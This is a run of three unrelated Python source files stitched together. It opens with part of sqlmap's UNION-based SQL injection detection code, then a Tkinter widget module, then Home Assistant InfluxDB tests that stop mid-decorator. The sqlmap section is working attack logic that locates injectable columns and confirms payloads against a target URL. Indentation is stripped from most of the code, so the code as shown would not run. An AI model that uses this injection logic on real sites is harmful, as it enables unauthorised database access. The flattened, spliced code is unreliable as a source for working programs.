removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if 0 < content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warn(warnMsg)
else:
break
return validPayload, vector
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None
vector = None
# Confirm the union SQL injection and get the exact column
# position which can be used to extract data
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full union
# SQL injection position
if not validPayload:
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
return validPayload, vector
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by a UNION-based
SQL injection vulnerability. The test is performed for up to 50 columns
of the target database table
"""
validPayload = None
vector = None
# In case that user explicitly stated number of columns affected
if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart
else:
count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE)
if count:
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]):
warnMsg = "if UNION based SQL injection is not detected, "
warnMsg += "please consider "
if not conf.uChar and count > 1 and kb.uChar == NULL:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
test = readInput(message, default="Y")
if test[0] not in ("y", "Y"):
warnMsg += "usage of option '--union-char' "
warnMsg += "(e.g. '--union-char=1') "
else:
conf.uChar = kb.uChar = str(randomInt(2))
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not conf.dbms:
if not conf.uChar:
warnMsg += "and/or try to force the "
else:
warnMsg += "forcing the "
warnMsg += "back-end DBMS (e.g. '--dbms=mysql') "
if not all([validPayload, vector]) and not warnMsg.endswith("consider "):
singleTimeWarnMessage(warnMsg)
return validPayload, vector
def unionTest(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by a UNION-based
SQL injection vulnerability. The test is performed up to 3*50 times
"""
if conf.direct:
return
kb.technique = PAYLOAD.TECHNIQUE.UNION
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload)
return validPayload, vector
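# --- Illustrative sketch (not part of sqlmap) --------------------------------
# The statistical branch of _findUnionCharCount() above singles out the column
# count whose comparison ratio falls outside mean +/- UNION_STDEV_COEFF * stdev
# of all observed ratios. A self-contained rendition of that idea (the function
# name and the default coefficient are assumptions for illustration, not
# sqlmap's API):
def _outlierColumnCount(items, coeff=7.0):
    """items: list of (count, ratio) pairs; return the count whose ratio
    deviates from the mean by more than coeff standard deviations."""
    ratios = [ratio for _, ratio in items]
    mean = sum(ratios) / float(len(ratios))
    deviation = (sum((r - mean) ** 2 for r in ratios) / float(len(ratios))) ** 0.5
    if deviation == 0:  # all responses look alike; no usable outlier
        return None
    outliers = [(abs(ratio - mean), count) for count, ratio in items
                if abs(ratio - mean) > coeff * deviation]
    return max(outliers)[1] if outliers else None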
|
|
# Various useful small widgets
#
# Written by Konrad Hinsen <hinsen@cnrs-orleans.fr>
# Last revision: 2000-10-18
#
_undocumented = 1
import Tkinter, Dialog, FileDialog
import copy, os, string
class FilenameEntry(Tkinter.Frame):
"""Filename entry widget
Constructor: FilenameEntry(|master|, |text|, |browse_pattern|='*',
                           |must_exist|=1)
Arguments:
|master| -- the master widget
|text| -- the label in front of the filename box
|browse_pattern| -- the filename matching pattern that determines the
                    file list in the file selection dialog
|must_exist| -- allow only names of existing files
A FilenameEntry widget consists of three parts: an identifying
label, a text entry field for the filename, and a button labelled
'Browse...' which calls a file selection dialog box for picking a file
name.
"""
def __init__(self, master, text, browse_pattern = '*', must_exist = 1,
**attr):
self.pattern = browse_pattern
self.must_exist = must_exist
newattr = copy.copy(attr)
newattr['text'] = text
Tkinter.Frame.__init__(self, master)
apply(Tkinter.Label, (self,), newattr).pack(side=Tkinter.LEFT)
self.filename = Tkinter.StringVar()
Tkinter.Button(self, text="Browse...",
command=self.browse).pack(side=Tkinter.RIGHT)
newattr = copy.copy(attr)
newattr['textvariable'] = self.filename
entry = apply(Tkinter.Entry, (self,), newattr)
entry.pack(side=Tkinter.RIGHT, expand=1, fill=Tkinter.X)
entry.icursor("end")
def browse(self):
file = FileDialog.LoadFileDialog(self).go(pattern=self.pattern)
if file:
self.filename.set(file)
def get(self):
"""Return the current filename. If |must_exist_flag| is true,
verify that the name refers to an existing file.
Otherwise an error message is displayed and a ValueError is raised.
"""
filename = self.filename.get()
if self.must_exist and not os.path.exists(filename):
Dialog.Dialog(self, title='File not found',
text='The file "' + filename + '" does not exist.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return filename
class FloatEntry(Tkinter.Frame):
"""An entry field for float numbers
Constructor: FloatEntry(|master|, |text|, |init|=None,
                        |lower|=None, |upper|=None)
Arguments:
|master| -- the master widget
|text| -- the label in front of the entry field
|init| -- an optional initial value (default: blank field)
|upper| -- an optional upper limit for the value
|lower| -- an optional lower limit for the value
A FloatEntry widget consists of a label followed by a text entry
field.
"""
def __init__(self, master, text, init = None, lower=None, upper=None,
name = None, **attr):
self.text = text
self.lower = lower
self.upper = upper
if name is None:
name = text
self.name = name
newattr = copy.copy(attr)
newattr['text'] = text
Tkinter.Frame.__init__(self, master)
apply(Tkinter.Label, (self,), newattr).pack(side=Tkinter.LEFT)
self.value = Tkinter.DoubleVar()
if init is not None:
self.value.set(init)
newattr = copy.copy(attr)
newattr['textvariable'] = self.value
self.entry = apply(Tkinter.Entry, (self,), newattr)
self.entry.pack(side=Tkinter.RIGHT, anchor=Tkinter.E,
expand=1, fill=Tkinter.X)
self.entry.icursor("end")
def bind(self, sequence=None, func=None, add=None):
self.entry.bind(sequence, func, add)
def set(self, value):
"Set the value to |value|."
return self.value.set(value)
def get(self):
"""Return the current value, verifying that it is a number
and between the specified limits. Otherwise an error message
is displayed and a ValueError is raised."""
try:
value = self.value.get()
except (Tkinter.TclError, ValueError):
Dialog.Dialog(self, title='Illegal value',
text='The value of "' + self.name +
'" must be a number.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
range_check = 0
if self.lower is not None and value < self.lower:
range_check = -1
if self.upper is not None and value > self.upper:
range_check = 1
if range_check != 0:
text = 'The value of "' + self.name + '" must not be '
if range_check < 0:
    text = text + 'smaller than ' + repr(self.lower) + '.'
else:
    text = text + 'larger than ' + repr(self.upper) + '.'
Dialog.Dialog(self, title='Value out of range', text=text,
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return value
class IntEntry(FloatEntry):
"""An entry field for integer numbers
Constructor: IntEntry(|master|, |text|, |init|=None,
                      |lower|=None, |upper|=None)
Arguments:
|master| -- the master widget
|text| -- the label in front of the entry field
|init| -- an optional initial value (default: blank field)
|upper| -- an optional upper limit for the value
|lower| -- an optional lower limit for the value
An IntEntry widget consists of a label followed by a text entry
field.
"""
def get(self):
"""Return the current value, verifying that it is an integer
and between the specified limits. Otherwise an error message
is displayed and a ValueError is raised."""
value = FloatEntry.get(self)
ivalue = int(value)
if ivalue != value:
Dialog.Dialog(self, title='Illegal value',
text='The value of "' + self.name +
'" must be an integer.',
bitmap='warning', default=0,
strings = ('Cancel',))
raise ValueError
return ivalue
class ButtonBar(Tkinter.Frame):
"""A horizontal array of buttons
Constructor: ButtonBar(|master|, |left_button_list|, |right_button_list|)
Arguments:
|master| -- the master widget
|left_button_list| -- a list of (text, action) tuples specifying the
buttons on the left-hand side of the button bar
|right_button_list| -- a list of (text, action) tuples specifying the
buttons on the right-hand side of the button bar
"""
def __init__(self, master, left_button_list, right_button_list):
Tkinter.Frame.__init__(self, master, bd=2, relief=Tkinter.SUNKEN)
for button, action in left_button_list:
Tkinter.Button(self, text=button,
command=action).pack(side=Tkinter.LEFT)
for button, action in right_button_list:
Tkinter.Button(self, text=button,
command=action).pack(side=Tkinter.RIGHT)
class StatusBar(Tkinter.Frame):
"""A status bar
Constructor: StatusBar(|master|)
Arguments:
|master| -- the master widget
A status bar can be used to inform the user about the status of an
ongoing calculation. A message can be displayed with set() and
removed with clear(). In both cases, the StatusBar object makes
sure that the change takes place immediately. While a message
is being displayed, the cursor form is changed to a watch.
"""
def __init__(self, master):
Tkinter.Frame.__init__(self, master, bd=2, relief=Tkinter.RAISED)
self.text = Tkinter.Label(self, text='')
self.text.pack(side=Tkinter.LEFT, expand=Tkinter.YES)
def set(self, text):
self.text.configure(text = text)
self.text.update_idletasks()
self.master.configure(cursor='watch')
self.update()
self.update_idletasks()
def clear(self):
self.text.configure(text = '')
self.text.update_idletasks()
self.master.configure(cursor='top_left_arrow')
self.update_idletasks()
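# Illustrative sketch (not part of the original module): wiring a StatusBar
# and a ButtonBar together, following the same Python 2 / Tkinter conventions
# as the widgets above. The names and the one-second delay are assumptions
# chosen for demonstration.
def _status_bar_demo():
    root = Tkinter.Tk()
    status = StatusBar(root)
    status.pack(side=Tkinter.BOTTOM, fill=Tkinter.X)
    def busy():
        # Show a message (cursor becomes a watch), clear it a second later.
        status.set('Working...')
        root.after(1000, status.clear)
    ButtonBar(root, [('Start', busy)],
              [('Quit', root.destroy)]).pack(side=Tkinter.TOP, fill=Tkinter.X)
    root.mainloop()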
#
# The following class was taken from the Pythonware Tkinter introduction
#
class ModalDialog(Tkinter.Toplevel):
def __init__(self, parent, title = None):
Tkinter.Toplevel.__init__(self, parent)
self.transient(parent)
if title:
self.title(title)
self.parent = parent
self.result = None
body = Tkinter.Frame(self)
self.initial_focus = self.body(body)
body.pack(padx=5, pady=5)
self.buttonbox()
self.grab_set()
if not self.initial_focus:
self.initial_focus = self
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.initial_focus.focus_set()
self.wait_window(self)
#
# construction hooks
def body(self, master):
# create dialog body. return widget that should have
# initial focus. this method should be overridden
pass
def buttonbox(self):
# add standard button box. override if you don't want the
# standard buttons
box = Tkinter.Frame(self)
w = Tkinter.Button(box, text="OK", width=10,
command=self.ok, default=Tkinter.ACTIVE)
w.pack(side=Tkinter.LEFT, padx=5, pady=5)
w = Tkinter.Button(box, text="Cancel", width=10, command=self.cancel)
w.pack(side=Tkinter.LEFT, padx=5, pady=5)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
box.pack()
#
# standard button semantics
def ok(self, event=None):
if not self.validate():
self.initial_focus.focus_set() # put focus back
return
self.withdraw()
self.update_idletasks()
self.apply()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
#
# command hooks
def validate(self):
return 1 # override
def apply(self):
pass # override
if __name__ == '__main__':
class MyDialog(ModalDialog):
def body(self, master):
Tkinter.Label(master, text="First:").grid(row=0)
Tkinter.Label(master, text="Second:").grid(row=1)
self.e1 = IntEntry(master, '', 0, 0, 10, fg='red')
self.e2 = Tkinter.Entry(master)
self.e1.grid(row=0, column=1)
self.e2.grid(row=1, column=1)
return self.e1 # initial focus
def apply(self):
first = self.e1.get()  # IntEntry.get() already returns an int
second = string.atoi(self.e2.get())
self.result = first, second
root = Tkinter.Tk()
Tkinter.Button(root, text="Hello!").pack()
root.update()
d = MyDialog(root)
print d.result
|
|
"""The tests for the InfluxDB component."""
from dataclasses import dataclass
import datetime
from unittest.mock import MagicMock, Mock, call, patch
import pytest
import homeassistant.components.influxdb as influxdb
from homeassistant.components.influxdb.const import DEFAULT_BUCKET
from homeassistant.const import (
EVENT_STATE_CHANGED,
PERCENTAGE,
STATE_OFF,
STATE_ON,
STATE_STANDBY,
)
from homeassistant.core import split_entity_id
from homeassistant.setup import async_setup_component
INFLUX_PATH = "homeassistant.components.influxdb"
INFLUX_CLIENT_PATH = f"{INFLUX_PATH}.InfluxDBClient"
BASE_V1_CONFIG = {}
BASE_V2_CONFIG = {
"api_version": influxdb.API_VERSION_2,
"organization": "org",
"token": "token",
}
@dataclass
class FilterTest:
"""Class for capturing a filter test."""
id: str
should_pass: bool
@pytest.fixture(autouse=True)
def mock_batch_timeout(hass, monkeypatch):
"""Mock the event bus listener and the batch timeout for tests."""
hass.bus.listen = MagicMock()
monkeypatch.setattr(
f"{INFLUX_PATH}.InfluxThread.batch_timeout",
Mock(return_value=0),
)
@pytest.fixture(name="mock_client")
def mock_client_fixture(request):
"""Patch the InfluxDBClient object with mock for version under test."""
if request.param == influxdb.API_VERSION_2:
client_target = f"{INFLUX_CLIENT_PATH}V2"
else:
client_target = INFLUX_CLIENT_PATH
with patch(client_target) as client:
yield client
@pytest.fixture(name="get_mock_call")
def get_mock_call_fixture(request):
"""Get version specific lambda to make write API call mock."""
def v2_call(body, precision):
data = {"bucket": DEFAULT_BUCKET, "record": body}
if precision is not None:
data["write_precision"] = precision
return call(**data)
if request.param == influxdb.API_VERSION_2:
return lambda body, precision=None: v2_call(body, precision)
# pylint: disable=unnecessary-lambda
return lambda body, precision=None: call(body, time_precision=precision)
def _get_write_api_mock_v1(mock_influx_client):
"""Return the write api mock for the V1 client."""
return mock_influx_client.return_value.write_points
def _get_write_api_mock_v2(mock_influx_client):
"""Return the write api mock for the V2 client."""
return mock_influx_client.return_value.write_api.return_value.write
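# Illustrative helper sketch (an assumption for this write-up, not part of the
# original suite): the tests below repeat the same pair of assertions, which
# the version-agnostic get_mock_call fixture makes possible to express once.
def _assert_single_write(write_api, get_mock_call, body, precision=None):
    """Assert that exactly one write happened with the expected,
    version-normalised call."""
    assert write_api.call_count == 1
    assert write_api.call_args == get_mock_call(body, precision)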
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(
influxdb.DEFAULT_API_VERSION,
{
"api_version": influxdb.DEFAULT_API_VERSION,
"username": "user",
"password": "password",
"verify_ssl": "False",
},
_get_write_api_mock_v1,
),
(
influxdb.API_VERSION_2,
{
"api_version": influxdb.API_VERSION_2,
"token": "token",
"organization": "organization",
"bucket": "bucket",
},
_get_write_api_mock_v2,
),
],
indirect=["mock_client"],
)
async def test_setup_config_full(hass, mock_client, config_ext, get_write_api):
"""Test the setup with full configuration."""
config = {
"influxdb": {
"host": "host",
"port": 123,
"database": "db",
"max_retries": 4,
"ssl": "False",
}
}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert get_write_api(mock_client).call_count == 1
@pytest.mark.parametrize(
"mock_client, config_base, config_ext, expected_client_args",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": False,
},
{
"ssl": True,
"verify_ssl": False,
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": True,
},
{
"ssl": True,
"verify_ssl": True,
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": "fake/path/ca.pem",
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": "fake/path/ca.pem",
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": False,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": False,
},
{
"verify_ssl": False,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": True,
},
{
"verify_ssl": True,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
),
],
indirect=["mock_client"],
)
async def test_setup_config_ssl(
hass, mock_client, config_base, config_ext, expected_client_args
):
"""Test the setup with various verify_ssl values."""
config = {"influxdb": config_base.copy()}
config["influxdb"].update(config_ext)
with patch("os.access", return_value=True):
with patch("os.path.isfile", return_value=True):
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert expected_client_args.items() <= mock_client.call_args.kwargs.items()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(influxdb.DEFAULT_API_VERSION, BASE_V1_CONFIG, _get_write_api_mock_v1),
(influxdb.API_VERSION_2, BASE_V2_CONFIG, _get_write_api_mock_v2),
],
indirect=["mock_client"],
)
async def test_setup_minimal_config(hass, mock_client, config_ext, get_write_api):
"""Test the setup with minimal configuration and defaults."""
config = {"influxdb": {}}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert get_write_api(mock_client).call_count == 1
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(influxdb.DEFAULT_API_VERSION, {"username": "user"}, _get_write_api_mock_v1),
(
influxdb.DEFAULT_API_VERSION,
{"token": "token", "organization": "organization"},
_get_write_api_mock_v1,
),
(
influxdb.API_VERSION_2,
{"api_version": influxdb.API_VERSION_2},
_get_write_api_mock_v2,
),
(
influxdb.API_VERSION_2,
{"api_version": influxdb.API_VERSION_2, "organization": "organization"},
_get_write_api_mock_v2,
),
(
influxdb.API_VERSION_2,
{
"api_version": influxdb.API_VERSION_2,
"token": "token",
"organization": "organization",
"username": "user",
"password": "pass",
},
_get_write_api_mock_v2,
),
],
indirect=["mock_client"],
)
async def test_invalid_config(hass, mock_client, config_ext, get_write_api):
"""Test the setup with invalid config or config options specified for wrong version."""
config = {"influxdb": {}}
config["influxdb"].update(config_ext)
assert not await async_setup_component(hass, influxdb.DOMAIN, config)
async def _setup(hass, mock_influx_client, config_ext, get_write_api):
"""Prepare client for next test and return event handler method."""
config = {
"influxdb": {
"host": "host",
"exclude": {"entities": ["fake.excluded"], "domains": ["another_fake"]},
}
}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
# A call is made to the write API during setup to test the connection.
# Therefore we reset the write API mock here before the test begins.
get_write_api(mock_influx_client).reset_mock()
return hass.bus.listen.call_args_list[0][0][1]
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
# map of HA State to valid influxdb [state, value] fields
valid = {
"1": [None, 1],
"1.0": [None, 1.0],
STATE_ON: [STATE_ON, 1],
STATE_OFF: [STATE_OFF, 0],
STATE_STANDBY: [STATE_STANDBY, None],
"foo": ["foo", None],
}
for in_, out in valid.items():
attrs = {
"unit_of_measurement": "foobars",
"longitude": "1.1",
"latitude": "2.2",
"battery_level": f"99{PERCENTAGE}",
"temperature": "20c",
"last_seen": "Last seen 23 minutes ago",
"updated_at": datetime.datetime(2017, 1, 1, 0, 0),
"multi_periods": "0.120.240.2023873",
}
state = MagicMock(
state=in_,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {
"longitude": 1.1,
"latitude": 2.2,
"battery_level_str": f"99{PERCENTAGE}",
"battery_level": 99.0,
"temperature_str": "20c",
"temperature": 20.0,
"last_seen_str": "Last seen 23 minutes ago",
"last_seen": 23.0,
"updated_at_str": "2017-01-01 00:00:00",
"updated_at": 20170101000000,
"multi_periods_str": "0.120.240.2023873",
},
}
]
if out[0] is not None:
body[0]["fields"]["state"] = out[0]
if out[1] is not None:
body[0]["fields"]["value"] = out[1]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_no_units(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener for missing units."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
for unit in (None, ""):
if unit:
attrs = {"unit_of_measurement": unit}
else:
attrs = {}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_inf(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with large or invalid numbers."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
attrs = {"bignumstring": "9" * 999, "nonumstring": "nan"}
state = MagicMock(
state=8,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 8},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_states(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against ignored states."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
for state_state in (1, "unknown", "", "unavailable"):
state = MagicMock(
state=state_state,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
if state_state == 1:
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
else:
assert not write_api.called
write_api.reset_mock()
def execute_filter_test(hass, tests, handler_method, write_api, get_mock_call):
"""Execute all tests for a given filtering test."""
for test in tests:
domain, entity_id = split_entity_id(test.id)
state = MagicMock(
state=1,
domain=domain,
entity_id=test.id,
object_id=entity_id,
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": test.id,
"tags": {"domain": domain, "entity_id": entity_id},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
if test.should_pass:
write_api.assert_called_once()
assert write_api.call_args == get_mock_call(body)
else:
assert not write_api.called
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a denylist."""
config = {"exclude": {"entities": ["fake.denylisted"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("fake.denylisted", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist_domain(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain denylist."""
config = {"exclude": {"domains": ["another_fake"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.denylisted", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist_glob(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a glob denylist."""
config = {"exclude": {"entity_globs": ["*.excluded_*"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("fake.excluded_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against an allowlist."""
config = {"include": {"entities": ["fake.included"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.included", True),
FilterTest("fake.excluded", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist_domain(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain allowlist."""
config = {"include": {"domains": ["fake"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.excluded", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
